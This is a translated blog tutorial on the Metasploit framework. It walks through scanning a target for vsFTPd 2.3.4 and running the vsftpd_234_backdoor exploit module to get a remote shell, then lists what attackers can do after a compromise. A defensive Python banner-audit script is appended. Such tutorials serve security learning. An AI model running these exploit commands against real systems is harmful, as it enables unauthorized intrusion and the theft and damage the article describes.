Arsenal: the Metasploit Penetration Testing Framework in Practice





Introduction


The Metasploit penetration testing framework can be used directly on Kali, with no need to build a complicated environment first.


To install Kali, see the earlier article "The latest version of kali2020 system installation (super detailed)".


Metasploit is a free, downloadable framework with which you can easily obtain, develop and run exploits against computer software vulnerabilities. It ships with hundreds of professional-grade exploit tools for known software vulnerabilities.


Hands-on practice


Run Metasploit


1. Without further ado: start Kali, open a terminal and enter msfconsole to start the Metasploit framework console.



2. Enter show followed by a module type to list the modules of that type.


Auxiliary modules (auxiliary): scan, discover vulnerabilities and gather information.

Exploit modules (exploits): use a discovered vulnerability to attack the remote target system, then implant and run the attack payload, thereby taking control of the target system.

Payload modules (payloads): the code that execution jumps into once the vulnerability has been triggered and the program's execution flow has been hijacked. These modules save security staff the cost of developing that code themselves.

NOP modules (nops): add null instructions in front of the shellcode so that random addresses and return-address errors do not break the payload's execution. They give the shellcode a large safe landing area.

Encoder modules (encoders): encode the attack payload (similar to encrypting it) so that the operating system and anti-virus software do not recognize it. The encoded payload becomes larger, so at this point you need to choose a paired stager and stage payload to download the target payload and run it.

Post modules (post): first take an unimportant target (A), then use A to attack the real target (B), with A carrying out the actual attack.


3. For example, to find out which FTP version a server runs, enter use auxiliary/scanner/ftp/ftp_version to switch to that auxiliary module, then scan for the FTP service version.

set rhosts 192.168.88.45

-- Configure the target IP address (a domain name also works)

set rport 21

-- Configure the target port

run

-- Run the scan

The scan output reports the FTP service version as vsFTPd 2.3.4.

4. Use search vsFTPd 2.3.4 to search for vulnerabilities related to this version. The search matches one related vulnerability and lists one exp (exploit module) for it.

5. Switch to that exploit module and run it:

use exploit/unix/ftp/vsftpd_234_backdoor

-- Switch to the exploit module

set rhosts 192.168.88.45

-- Configure the target

run

-- Run the exploit against the target


As the output shows, an interactive shell has been established that can execute any command. Once this succeeds, your server is effectively mine, and I can do whatever I want with it.


6. What can be done after a successful compromise?

A few years ago security awareness was weak and people did not care much about network security. To spread some security knowledge, here is what hackers can do after your computer has been compromised.

A. Implant a malicious program that records your username and password when you transfer money online, in order to steal from you.

B. Implant a mining program that consumes your computer's CPU and GPU for mining, causing the computer to freeze, lose Internet access, and so on.

C. Plant a virus that causes blue screens, makes the computer unusable, and so on.

D. Plant ransomware, encrypt your work data and demand a ransom from you.
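
Steps 3 and 4 identify the vulnerable service purely from its FTP greeting banner. The same check run from the defender's side over banners collected from your own hosts, as an added example that is not part of the original article; the hosts and banners are constructed sample data and the function names are hypothetical.

```python
import re

# Version the page's scan reported and that `search` matched to the
# exploit/unix/ftp/vsftpd_234_backdoor module.
FLAGGED = ("vsftpd", "2.3.4")

# Constructed sample inventory (not real scan data): host -> raw FTP greeting.
SAMPLE_BANNERS = {
    "192.0.2.10": "220 (vsFTPd 2.3.4)\r\n",
    "192.0.2.11": "220 (vsFTPd 3.0.5)\r\n",
    "192.0.2.12": "220-Welcome to files.example\r\n220-Authorized use only\r\n220 (vsFTPd 2.3.4)\r\n",
    "192.0.2.13": "220 ProFTPD Server ready.\r\n",
    "192.0.2.14": "421 Service not available\r\n",
}

_VERSION_RE = re.compile(r"\b(vsftpd)\s+(\d+(?:\.\d+)+)", re.IGNORECASE)


def greeting_text(raw):
    """Return the text of a 220 greeting (single- or multi-line), else None."""
    lines = [l for l in raw.replace("\r\n", "\n").split("\n") if l]
    if not lines or not re.match(r"220[ -]", lines[0]):
        return None
    parts = []
    for line in lines:
        if line[:4] in ("220-", "220 "):
            parts.append(line[4:])
            if line[3] == " ":
                break  # "220 " (with a space) ends a multi-line reply
        else:
            parts.append(line.strip())  # continuation line without a code
    return " ".join(parts)


def parse_version(raw):
    """Return ("vsftpd", version) if the greeting names vsFTPd, else None."""
    text = greeting_text(raw)
    m = _VERSION_RE.search(text) if text else None
    return (m.group(1).lower(), m.group(2)) if m else None


def audit(banners):
    """Return the sorted hosts whose greeting reports the flagged version."""
    return sorted(h for h, raw in banners.items() if parse_version(raw) == FLAGGED)


if __name__ == "__main__":
    for host in audit(SAMPLE_BANNERS):
        print(f"{host}: banner reports vsFTPd 2.3.4, check package origin and upgrade")
```

A server that hides or customizes its greeting will not be flagged, so pair the banner check with a package inventory of the hosts themselves.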



Origin blog.51cto.com/6318638/2674598